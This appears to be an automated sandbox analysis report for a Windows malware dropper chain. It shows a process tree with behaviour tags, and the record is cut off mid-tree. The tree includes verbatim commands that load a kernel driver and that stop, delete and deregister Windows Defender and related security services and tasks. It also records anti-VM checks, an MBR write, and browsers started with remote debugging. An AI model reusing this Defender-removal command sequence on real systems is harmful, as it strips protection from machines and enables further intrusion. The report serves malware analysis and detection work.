PID 5856 wrote to memory of 4348	5856	cmd.exe	129
PID 5856 wrote to memory of 4348	5856	cmd.exe	129
PID 5856 wrote to memory of 4532	5856	cmd.exe	130
PID 5856 wrote to memory of 4532	5856	cmd.exe	130
PID 5856 wrote to memory of 2892	5856	cmd.exe	131
PID 5856 wrote to memory of 2892	5856	cmd.exe	131
PID 5856 wrote to memory of 2828	5856	cmd.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2532
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3104

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0F78.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g0F78.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1R32M4.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1R32M4.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Users\Admin\AppData\Local\Temp\10340260101\d14d379e03.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\d14d379e03.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3384
    - - C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5400
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:780
    - - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\10362200101\c4b6836368.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10362200101\c4b6836368.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5720
    - - C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2816
      - C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:812
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\88.tmp\89.tmp\8A.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6088
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\114.tmp\115.tmp\116.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:5856
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:1328
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:5740
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:3200
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:4544
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:4348
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4532
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2892
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:2828
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:544
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:2436
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:776
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:2220
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:4464
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:5652
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:3128
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:3552
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:6140
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:3176
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:4640
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:4620
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:3288
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:5836
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:5796
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:4340
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:1988
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:1568
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:5496
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:1132
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:5308
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:1904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:1516
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:6036
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:3916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:2632
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:2540
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:1176
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:5816
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:5404
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:5400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:2732
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:2412
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:3452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:6072
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:784
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:4028
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:4088
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:3268
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:764
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:4360
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:4432
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:3580
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:2524
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:5304
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:3484
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:3388
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:3728
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:2936
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:4584
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:5216
    - - C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2968
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffebd8ddcf8,0x7ffebd8ddd04,0x7ffebd8ddd10
        8⤵
        
        PID:2644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1900,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1896 /prefetch:2
        8⤵
        
        PID:1336
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2276 /prefetch:3
        8⤵
        
        PID:3608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2412 /prefetch:8
        8⤵
        
        PID:3680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3232 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3288 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4320 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:2592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4768,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4784 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5372,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5384 /prefetch:8
        8⤵
        
        PID:3532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5544,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5540 /prefetch:8
        8⤵
        
        PID:1440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5564 /prefetch:8
        8⤵
        
        PID:3888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5416,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5420 /prefetch:8
        8⤵
        
        PID:4980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5568 /prefetch:8
        8⤵
        
        PID:5236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6016,i,12166362984009076733,1412144940472295772,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5872 /prefetch:8
        8⤵
        
        PID:536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:3112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ffebb64f208,0x7ffebb64f214,0x7ffebb64f220
        9⤵
        
        PID:5236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1896,i,10832215083010097456,17687986497381914227,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:3
        9⤵
        
        PID:1440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2416,i,10832215083010097456,17687986497381914227,262144 --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:2
        9⤵
        
        PID:2020
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2172,i,10832215083010097456,17687986497381914227,262144 --variations-seed-version --mojo-platform-channel-handle=2452 /prefetch:8
        9⤵
        
        PID:5552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3492,i,10832215083010097456,17687986497381914227,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3500,i,10832215083010097456,17687986497381914227,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\dtrqi" & exit
        7⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:4512
    - - C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2160
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5884
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:3736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3276
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5316
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3576
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        9⤵
        Uses browser remote debugging
        
        PID:5364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x13c,0x144,0x7ffebd8ddcf8,0x7ffebd8ddd04,0x7ffebd8ddd10
        10⤵
        
        PID:5028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1820,i,10959574774457032503,16593070375113834062,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2516 /prefetch:3
        10⤵
        
        PID:4860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
